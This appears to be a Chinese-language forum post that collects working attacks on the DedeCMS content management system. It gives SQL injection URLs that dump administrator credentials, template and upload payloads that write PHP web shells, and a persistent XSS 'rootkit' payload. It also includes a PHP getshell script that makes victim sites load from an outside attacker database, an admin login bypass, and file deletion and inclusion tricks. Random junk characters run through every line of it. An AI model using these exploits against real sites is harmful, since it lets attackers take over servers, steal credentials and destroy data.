|
|
- w0 a8 r l$ Z% ]$ f; P. d
Dedecms 5.6 rss注入漏洞2 b8 X2 N! h9 w6 }5 G0 ?" a
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
# k5 |/ M$ J" ?: e& e, _8 x7 T; R6 F# [. H# J! n6 I5 {) W5 O
) R" n: L; q O* d8 c+ h" F* i' R9 L; r& H: P1 Z# B
0 p- i( J" T6 W# e: n' l0 t+ ?& U/ s m: U/ I/ T
# `' A2 u9 h5 H( A5 Q) K2 Q9 \
6 Z* P8 `* B" l* I# e
; g8 g: l- O! L% p$ q+ j
DedeCms v5.6 嵌入恶意代码执行漏洞4 V3 W1 u" \! |, i$ f6 x: b
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}6 }/ G# i% V9 B4 |7 H) ]
发表后查看或修改即可执行' i, i _1 l5 ]- ?" `
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
! o' i3 m! p) L0 s7 S# u+ f生成x.php 密码xiao,直接生成一句话。
# Z4 _) `2 n6 _9 f
, o: q! q i* F. J( n# y# h( S3 L7 h+ Y, Y t7 ?$ U
+ P v6 @' c( y( f& W! J8 J
+ J' a$ s8 M& X! n2 ]
- z$ K3 y4 B, o
. G+ N% A$ ^9 j( J- X4 \: \- w; s- k& E8 N4 q
# U+ X0 A3 ]6 o- rDede 5.6 GBK SQL注入漏洞2 r$ _% x$ \/ {; n7 H9 g3 q
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
; p1 W3 Y+ c7 ^3 Mhttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
' ?% M; ?7 D2 w' e! qhttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
: ^9 n5 {; r9 m4 ]# H/ F E" T, x, h: }& ?6 k3 \5 m) u; b
7 }* F1 b) Q4 k0 f$ I, {! J' ]; T9 s& b- j% D& r8 o
# D* |* N3 _* z. A9 S! i ~. n
" P+ k$ o/ V4 q) B5 \. u
" [+ x; ?3 D% z8 K
; g6 x- o0 x7 S7 l7 `6 H! R( H9 ~: { j, w
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞: @! g4 {3 |! F1 f8 f
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` ) o; R' R2 a* J7 q' T; l* j- k* |8 j
0 i* q( [( }; r" x# \/ J( F
3 h6 I3 D; X9 N* }8 w
; g r; F W9 {( u6 `3 d
) I! d7 n9 N( d& {- U! w' F: k1 d1 a6 n, \" U- b
! [7 a4 F4 ^3 U, C9 `; T8 J* C1 w
DEDECMS 全版本 gotopage变量XSS漏洞7 }4 \; a4 ^1 [. d! c
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
0 G0 b7 \* p1 d) Phttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
( {6 n( I" n% U" `' {, d+ @! _0 _/ X. `) L8 j. F, b' U$ A
4 N. O1 [" y3 {0 l+ w2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 ; n# D5 c: F* K( I( ?/ I! x
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
, S) a9 U* x- j3 W6 y3 g; N. j+ O7 Q3 c$ M! B
7 I# O, Z# \3 N! F7 v! n
http://v57.demo.dedecms.com/dede/login.php. E; o: E; h* L
9 D: X6 C4 C1 H' t8 ^$ F
0 A0 m& L5 u$ g, R/ h# Z1 p
color=Red]DeDeCMS(织梦)变量覆盖getshell
% Z V6 p, @- \9 @8 U/ m#!usr/bin/php -w+ K' b+ q, |6 {' }8 q
<?php6 N+ U7 D1 r( @, u
error_reporting(E_ERROR);& d* g5 O* z9 T
set_time_limit(0);- w& V0 R7 { u! w3 G' \
print_r('
$ Z$ ^; B6 V7 L$ i6 ZDEDEcms Variable Coverage
! B$ g. x5 R) t8 A/ KExploit Author: www.heixiaozi.comwww.webvul.com. _( r9 a# S9 Q! R6 O
);$ i' j2 F" M( N5 _ Q
echo "\r\n";
+ A/ r1 x4 ^. n5 Z) A! L9 mif($argv[2]==null){
; v+ B; d' V# bprint_r('5 Q+ p. }7 d# j/ R& N! Z0 |
+---------------------------------------------------------------------------+( G& d& A0 p2 v. k% C/ O
Usage: php '.$argv[0].' url aid path# K: _5 d' }" y3 {8 r; w/ B
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
% l& |' j. @: e4 }5 oExample:
& i9 B" J$ ?0 J7 J1 }php '.$argv[0].' www.site.com 1 old/ b% X- X% A! V1 h0 a. t% h
+---------------------------------------------------------------------------+
) q% i8 [/ q3 T! H, U');2 ^# d+ S9 l8 |+ _" k w+ b& i1 F6 W" D
exit;' x7 f' Q$ }* j4 T
}
6 o1 g& P8 ~* u# w- U4 l$ [5 v2 @$url=$argv[1];: J- I7 X K, h! Z
$aid=$argv[2];1 @* {, |. a1 T: C4 \
$path=$argv[3];
1 S1 w6 k+ |9 c4 X/ ~7 {# P2 w$exp=Getshell($url,$aid,$path);
1 B9 N2 p+ e# ^3 k- u, s, M9 @if (strpos($exp,"OK")>12){
( F' {% v5 o; X! H0 b# T4 |echo "
0 c& N P$ B7 y0 nExploit Success \n";8 n$ L+ [5 X. b9 ]
if($aid==1)echo "6 [& e$ N! X- I, I( L
Shell:".$url."/$path/data/cache/fuck.php\n" ;
2 ~0 n1 R- }/ j- J+ p- B: D, K
% I2 ?) U! }5 ?+ d0 i1 ~+ p r0 O5 J! U( B
if($aid==2)echo "
. q9 N; T: U% _) R! ^2 a; n' ?4 a0 P& nShell:".$url."/$path/fuck.php\n" ;
# N2 l) S8 K# c& d% H. P
- a7 U" M$ V# M' z, Z
4 s* U, o+ r! j5 k9 @) }. Oif($aid==3)echo "
_6 q. S8 S! D* V8 o/ D9 q ^/ XShell:".$url."/$path/plus/fuck.php\n";
; @& w3 x! A( s: y4 P+ e7 _* @" S" F
$ q+ V1 Z; A+ x' h1 [ j) L}else{; i: g+ I" B8 R' t1 c
echo "* Z( n8 `8 ?# l1 y! R+ [- b
Exploit Failed \n";5 E3 c0 x/ V3 `: ? R
}
( ]1 g: r! ^, U0 M1 Z- Vfunction Getshell($url,$aid,$path){/ R$ Q- O' s) p3 G1 z, e# u3 K9 `- K
$id=$aid;+ b, k- m R0 l9 H& c/ [) }
$host=$url;( `1 W3 J6 M8 p* h
$port="80";
: V+ `! K0 r' `$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";; }& H) s' k$ F. H
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";( N) K% M& K/ C* p0 P1 W
$data .= "Host: ".$host."\r\n";
7 n/ F" x$ `; N3 ?& S5 u$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";) `; `: Y+ m6 Z* s. y* |' y: @
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
! |, l% r1 H7 q- _# S7 o# l0 ~" l$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";. h' }0 b. n' {; ]
//$data .= "Accept-Encoding: gzip,deflate\r\n";$ w) A4 G4 z: Q5 v9 L' q
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";; h' |% x, F$ o# g
$data .= "Connection: keep-alive\r\n";* I* Q# e- D- z6 y! N; O5 R
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
& z" N6 o) T7 F( ~( g9 Y* N1 r5 r$data .= "Content-Length: ".strlen($content)."\r\n\r\n";" l, [7 c( |0 Z! X2 ^
$data .= $content."\r\n";
6 Q' H. w7 Q8 q$ock=fsockopen($host,$port);
; I2 q0 h6 { E7 T$ Fif (!$ock) {, |- F5 m7 A3 y' z: E
echo ", e. L6 C1 R0 r* e9 U$ K
No response from ".$host."\n";
4 P5 n4 ?2 @) Z( A) i, h}
) ^. i, _! f! C. E# bfwrite($ock,$data);( m4 I4 i5 V) @' B
while (!feof($ock)) {4 J& Z/ `' E' I9 F% F
$exp=fgets($ock, 1024);
9 \! C3 y& f* ]( R7 X/ b8 h8 o2 _return $exp;
. c6 [: G9 _+ { e+ x7 C3 }* k}
7 P) ^1 z1 j' I: I" k}
% ^: Y2 L- ^9 ?: j; L# ?% b+ b, d3 X4 p
8 X% R* U- W. x; P. O6 u
?>( R4 x$ u+ F; c8 O, P
" |/ W7 f' c) K. x3 `/ k
. s# W C' e0 G2 v
3 c6 p3 `- ]% @6 i& z$ Z: p
{, `3 }( X3 b1 Q# m
* D3 r, K+ y, g, w% N
7 X* ]7 U' V( ~% i9 o- H" `+ d
2 u& [- E, W6 m! W2 Q: A7 U
! d. n( H0 K3 _. x! g @6 ~# O; M$ t: F$ o% y2 m
5 c# i+ j6 J% k! l# E% f0 I
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)# b! Q6 X" S$ i4 f: Y
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root* m- a) m3 g, v V0 [6 K, O
+ |0 `% A6 T( j6 Z% f, p: A- U
r r9 l, e. Q把上面validate=dcug改为当前的验证码,即可直接进入网站后台
# a7 c t2 J7 D$ W+ i! B6 t
# I5 D) c8 Y# Z n2 |# r3 {
" _: i: m0 ?! l此漏洞的前提是必须得到后台路径才能实现# {" y# f/ H6 v' \ E1 A5 U* E
5 {9 q+ _" a+ \$ ^
4 X0 y5 R6 W% \- H# i: G
: c" L# I0 P! W
, g, a+ m# p3 G6 K7 A. V
% l) J/ P' N2 V1 S& F+ z& |. x0 e7 u: o Z
( P5 B0 ~2 Q7 S
5 i! L8 O" ]& G3 g8 N/ A8 T7 R% n
5 @3 r% h' Y+ R& R. I: _: i; a
' ~% f- m L B* M8 w9 mDedecms织梦 标签远程文件写入漏洞
1 P. N$ Z) z# v# w8 a前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');" f9 B$ Y, e! t0 B
# x- D1 T; j9 T m9 d
& I' H& h9 m; {% T3 d9 T再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 4 X# a* n. M+ f% y: T8 |! u& Y( c
<form action="" method="post" name="QuickSearch" id="QuickSearch">
+ e4 [6 c; z# Q. B/ b9 l<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />4 E9 i7 v$ h1 Z9 I, I
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />8 T3 j4 f' C# h1 } a4 K6 m
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
+ w2 T* F. g `, w<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
6 f f/ f8 M" N9 E! c7 T<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />/ ^( q# b# F1 s2 K y' P
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />& ~( x3 |+ s' u7 q, J; ?6 e: g3 r! F
<input type="text" value="true" name="nocache" style="width:400">
% t" N5 ?" W; S<input type="submit" value="提交" name="QuickSearchBtn"><br />
1 U7 h% l3 \$ h0 x3 i# i5 Z+ h</form> L, m; D [- }3 q- c
<script>% D# G" z1 @6 D4 ]$ W3 W5 E! U
function addaction()
5 ]( a9 Z: O8 i' ^{! n" g. E4 c5 J" T/ ?$ o( T
document.QuickSearch.action=document.QuickSearch.doaction.value;
& c8 _5 L9 Q( `}
1 @9 q' O2 U j</script>/ [- S$ T9 B5 w8 T
& Z8 a3 c/ h$ P. S6 b5 t5 r' I
1 O% w$ [% o" u
- B" L( j# m( N/ f
0 B, _4 P- R7 l; F, x! t3 N: n! Y8 }; D, L- t& [# m3 C2 p5 b
8 ?4 n2 H) d5 q! }" n( v. x9 f2 e9 y$ p) L1 s$ ~( x3 q# u' G6 g7 q; I
' s: f [! h) q$ o$ \. `$ c1 `2 v, \- e# T3 {: X: q5 h$ p M
+ S @8 {! F* i |% s% P
DedeCms v5.6 嵌入恶意代码执行漏洞& }" L0 }( X9 Z: [3 P+ W
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行# s' [& g2 W9 i! J5 X" Q
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}7 g6 C# t9 A; Q3 E; \
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
3 i1 c$ `) ^" f: g$ IDedecms <= V5.6 Final模板执行漏洞& S, ?0 U' @( Y) z, [% f5 T
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
; Z6 S, g# X% c; ?8 U/ D/ muploads/userup/2/12OMX04-15A.jpg6 n2 O0 J/ O& C1 @* A
1 f% M* i- a8 U
8 f9 {; r4 O! X
模板内容是(如果限制图片格式,加gif89a):$ R# L' E/ k" U# l& S2 l
{dede:name runphp='yes'}3 Z5 L% P# v) m/ {# c
$fp = @fopen("1.php", 'a');
5 s, f* Z: g& T. f }@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");" Q: q: R# q1 { d
@fclose($fp);
( g A- C/ F: E# y$ a8 ~0 O{/dede:name}* ]) G0 Z/ B0 o9 k- `
2 修改刚刚发表的文章,查看源文件,构造一个表单:( }. s) j4 C5 w8 l
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
3 e* r0 ^: h. f2 T<input type="hidden" name="dopost" value="save" />" \4 X! B# M$ J6 M; o4 z
<input type="hidden" name="aid" value="2" />( W1 U0 t+ ]% K5 @ x# A
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />; ~/ G" w" }( o, z
<input type="hidden" name="channelid" value="1" />- y4 g9 v) M- u3 k& j- P9 y
<input type="hidden" name="oldlitpic" value="" />: P' _% Q) r8 l6 \0 h3 R5 }
<input type="hidden" name="sortrank" value="1275972263" />5 R0 C" F$ M$ N7 e8 F: Z
4 }- ^7 o/ P S/ B5 N+ O$ b5 a m' ~/ q# ` A
<div id="mainCp">
@2 k5 |) s, A7 ^+ j<h3 class="meTitle"><strong>修改文章</strong></h3>
; A; P9 p8 p% G
" ]' _: Y% ~3 ~! t7 k8 K+ x6 c( q. S$ |" B3 {; ~0 e) W
<div class="postForm">
3 a# g: c# R: m# t: X6 g# v<label>标题:</label>
" E9 p9 ~/ ]; @, E4 K% G! o<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
! h( A# A- j: f: _# e1 p8 L+ D
5 j7 f6 `. n9 h/ [1 p
4 R1 F% ]! m3 N/ r& S' H<label>标签TAG:</label>/ J7 a* p5 X I6 L
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开); `8 u9 H) V# A2 _, U
+ ^1 p2 x4 r5 q& C; M+ b9 {( c y9 r" ^
<label>作者:</label># M7 y% g" V0 A% W @
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
3 R+ C7 l' [) e4 d& s+ N1 u# y. b% m, m2 d3 R0 m
7 ^' n6 `' {% D<label>隶属栏目:</label>
. D7 a- m4 Q8 z f<select name='typeid' size='1'>! s( h+ p! r# }. ~/ Y
<option value='1' class='option3' selected=''>测试栏目</option>
& K8 v( g( X x+ m8 l: L+ \</select> <span style="color:#F00">*</span>(不能选择带颜色的分类) j7 z- @5 q3 H, S' j% J& v
. L( ~, u# y8 a7 W4 G' S
: t+ | F5 x/ A$ r" G<label>我的分类:</label>
8 }2 Z# v2 K0 G* `- `<select name='mtypesid' size='1'>
0 L i1 p6 q9 }# E% y0 |<option value='0' selected>请选择分类...</option>
- ~2 S$ h' s, q% [1 p2 L$ `<option value='1' class='option3' selected>hahahha</option>) O# x5 @* o. l; Q' R% Y, s" }
</select>
: p3 Z, @( n& k: U, z. L+ X
5 X: R; r' [8 `6 H- o/ ^9 m. f4 F" G. a: a' ^. F5 L( J& i# T
<label>信息摘要:</label>
" A" n6 G- x' S- h<textarea name="description" id="description">1111111</textarea> c) Y" J2 X4 m# H+ U" X
(内容的简要说明)# [0 X" K! Z$ X- _9 ~* `
5 a1 z3 Z! x( j* G/ r
2 E4 Z6 p5 H2 f1 |0 G. n; E
<label>缩略图:</label>
% H5 m5 V P& Z( i, H; M<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
4 N6 k6 ~/ I( ~" z2 y" L3 a& z* W& \, _3 [
( n# U. ]: x9 E Z<input type='text' name='templet'7 y* Q$ N @0 N1 I* U
value="../ uploads/userup/2/12OMX04-15A.jpg">4 O6 `) S6 G1 o$ b2 r/ \
<input type='text' name='dede_addonfields'
" x5 {; N* ^5 dvalue="templet,htmltext;">(这里构造)1 a/ y- z3 ?- V; q- m
</div>: O7 t: i( V3 D) E4 e8 G2 C0 Y7 m
( {# `. s, r7 ]: k8 `2 c9 U4 K' o1 T0 u
9 r4 b* e/ S9 P1 K. g9 _
<!-- 表单操作区域 -->, @) L0 ?0 Q2 m, w9 R
<h3 class="meTitle">详细内容</h3># h$ `4 A6 |' P( q1 _9 u c3 O
9 a: r1 K, l; D! H) H" o# g' e
& S- |) h- D. N. E
<div class="contentShow postForm">! a& g& l0 H! }* T9 x5 t
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe># K$ r$ c2 S" {9 i2 I) ?
- w! l! X3 ?6 Y7 ~4 d4 ^# C
7 y$ T' O- _4 Q/ T4 V: O7 y: A<label>验证码:</label>/ D4 M0 y5 v D
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />3 _* G( G7 d8 h
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
! R1 O5 G- H- n! h) N
% \, J8 Q0 l5 c3 F1 V
" i6 f) L% g5 x( h# ?4 Y<button class="button2" type="submit">提交</button>
* B: T7 P0 D+ ?, D6 K! t<button class="button2 ml10" type="reset">重置</button>
/ V5 p) q5 i" p2 P/ d$ D9 ?) ^</div>5 X& K! J, o/ @0 w+ m
7 ?) v6 a- d1 g/ i$ `% \% T( @8 G
5 d! W2 R0 `3 J9 x: h</div>
* r3 w7 J- n& F; F3 a( J2 @' i2 F: I2 \3 L3 r5 |# e( b$ {
9 I x# M5 L0 [</form>- A* j7 R% H* k8 N2 G+ p
& Y7 O# H6 m9 G
" A- e' s& W5 u* V7 `) @
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
7 H7 Y. z1 o5 p, z; I" E) O假设刚刚修改的文章的aid为2,则我们只需要访问:+ u# B9 ~) V. f; z" S7 j7 _, a/ F& j
http://127.0.0.1/dede/plus/view.php?aid=22 D" z- L6 A. [9 R4 L
即可以在plus目录下生成webshell:1.php) `& c) v; c$ t. ?4 ~4 [
1 q% L3 E3 p R+ s- V. h$ r% Q2 I
+ j0 g6 ^4 P7 f3 H) t
3 |7 L5 T. p! _2 X) y$ Q
4 N2 c& [& Y+ [
. ?* G0 M7 _& k- A; ^1 e- |7 a
. S A' S' O! A6 O, n0 a- w5 _6 I
# B8 I, K. h& l8 }3 V# P' [2 q) Q
) G, U) b# b9 g
- y- k3 n7 b' v% Q3 K; @( w0 y* {3 b' \$ A3 L$ h2 Y" Y$ ?/ n
3 c. N& h! b( q. A
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)* R: A! ^& G/ Q: I4 z6 x
Gif89a{dede:field name='toby57' runphp='yes'}
\! R9 a7 g3 @% G: V' |phpinfo();! x9 K- A1 z' I0 k4 C% f7 W& w
{/dede:field}
/ |( P& |* y9 P* d" O9 j m* U保存为1.gif& i* F$ |; G! h9 G5 A, ]
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
% K9 U7 b6 T8 X$ s R; Q; g<input type="hidden" name="aid" value="7" /> U0 Z: V( i! g3 N# S: k; s
<input type="hidden" name="mediatype" value="1" />
; Y4 Q2 p2 y. v; P1 j+ V1 h<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
2 y) |5 T( {6 j6 {- G, S1 Q5 @<input type="hidden" name="dopost" value="save" /> ' `% f3 H4 L$ v5 j) T3 J" w; ]
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> ; h, H! _( c) U' k- S8 X
<input name="addonfile" type="file" id="addonfile"/>
- Z7 W; F! c- B1 R- ?2 W- c7 V/ j<button class="button2" type="submit" >更改</button>
5 O K' |3 s! b# k% k</form> : B7 X+ z* W- _0 A. @6 e
3 f' E# {1 E0 |3 I
, G# O& u4 ^0 Q8 d构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
+ e! [* K; X8 ~8 F发表文章,然后构造修改表单如下:, z& R" c2 L8 f
9 l, ~$ S1 s' D, F3 m
* r: K7 |9 m v. p<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
) Z, f" ^+ ?/ s9 ~" O5 G1 i<input type="hidden" name="dopost" value="save" /> ; k6 ^; e- h/ v6 W) Z
<input type="hidden" name="aid" value="2" />
5 v' l9 l; A, \: z" R<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> # z. }" {& Q* c& ^& y# Z
<input type="hidden" name="channelid" value="1" /> ' [5 W C- I% P1 P# i$ |7 S0 X
<input type="hidden" name="oldlitpic" value="" /> * G% u% C: }: k$ T) X7 C
<input type="hidden" name="sortrank" value="1282049150" /> * I0 u" g8 T9 r
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
6 m. T9 K+ m! [9 M4 E+ q<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> + o# v( E5 ]! i" e" B X+ |, F
<select name='typeid' size='1'>
8 B# g/ p5 O; N<option value='1' class='option3' selected=''>Test</option>
% P! r+ \& m" o1 y* A7 c<select name='mtypesid' size='1'>
6 X! E# `/ |/ Z4 `! \, _<option value='0' selected>请选择分类...</option> ) i3 v' |6 w( O1 X
<option value='1' class='option3' selected>aa</option></select> , n( i2 |; N- I8 A+ _
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> 1 k% e0 R( Z, s2 Z* g R8 p
<input type='hidden' name='dede_addonfields' value="templet">
. S& Q8 u. g5 L+ y! ~! {<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> ) ]$ b8 ?0 g! U% f | J
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
) b a/ G: ?+ B' q0 J& M4 \+ s<button class="button2" type="submit">提交</button> 0 Z8 g' b' k( c. x X6 ~3 B, b
</form>
, f* b7 i- I/ y- j
1 z/ N2 a2 w( K! X% e% e
. M6 R$ I8 ]6 `3 u2 m# t7 _$ @7 S: N3 }
: {' ?& T7 A) @- v9 c2 M
8 m! F# N2 i2 c8 ?0 p( ^
: V# O/ F |( h) ]$ C9 ~" S8 R' K; h1 F* S! g: b
8 N) Q5 _; [7 h: ]3 N) J) v
6 Y: F+ U2 w2 Q9 n( U/ X% T2 C2 G2 L' p1 _. ~& G6 ?
" R4 r& X7 e& [ E4 h2 o8 U7 c' I
, S Z: ?, m3 L$ S1 f* \$ e/ }织梦(Dedecms)V5.6 远程文件删除漏洞7 X" j% a4 M2 x0 w6 T- M8 }; a
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif; C3 Y+ l- p# L* L, x, c, _
% n% T# x# I: D' ~/ N: T9 {$ c$ W4 O5 I% e- k2 p
3 t6 Z: @4 c# V. K/ U% H& a
- ^2 Y* L& g I* [4 Z5 y8 O2 [
# o! D8 b6 e' A1 S; p# q8 X5 z& {# a
0 L* I6 {4 Y9 O$ j' S# F! K- k
7 }, M" D& P6 h# j# {, C F6 t# o" Q# y4 p9 |
0 f2 j2 G r1 k" E# A+ `
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 + N* P/ @0 m; e) A
http://www.test.com/plus/carbuya ... urn&code=../../4 w1 v) L5 R; e
4 b! I' D/ D# g1 p: J+ {7 M1 B2 v/ y; d) B' Z
/ M: O% O `" z; X
! S, c- ~- j$ j! ^# O6 N i* ?5 n, y' f/ z- C7 Q6 ?
* W, @/ b2 u6 U a
# G' R5 v a, \ \
5 c7 i: _2 U& I5 P% n
2 v/ A0 Q4 @& u n0 e0 V7 I# f; s
. g0 d" g! |% K* y
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 ' i9 Y) U2 u9 ^9 B' q+ e# H' H
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`/ x: u3 h1 i2 e2 ?
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5, \' c9 l* F' v- V7 j
& ?% b% y' _6 }0 v) r2 j
. T6 X, L3 q/ w( P) {+ D% Q+ R6 n2 t0 O6 | B3 G0 {
5 s4 _6 g$ ], }- U% n( B) U
9 ^( C6 G; d: t+ c) _
8 F0 E. _, q$ m9 {' m
; _: m O K9 r! M# {# w
3 R- `- G1 t2 H5 y* \9 @" w+ S/ H# c2 N+ L T- P8 C5 Z5 w5 z' ]% ^2 @
/ C8 i0 u) w! b7 r9 b
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
/ {" Y- }3 {0 o0 Khttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
. M( j" V0 {$ k9 G' Z) _4 ?- v
" Q) [& @/ g* C3 G5 D* L- j% i" U
7 ?1 z3 r1 D% i9 _" K8 s$ x( _3 d. Y, k* r) @8 F) ^0 ^$ ?6 |: [
. T( M0 ^7 j5 \% ?/ [$ \1 M: g6 m7 i9 ~1 b. H# p* t, i- U
9 M$ c8 \4 W* `4 ~) i7 u' ^8 v7 T5 S7 B. O' _
S- {$ h* n1 ~# A
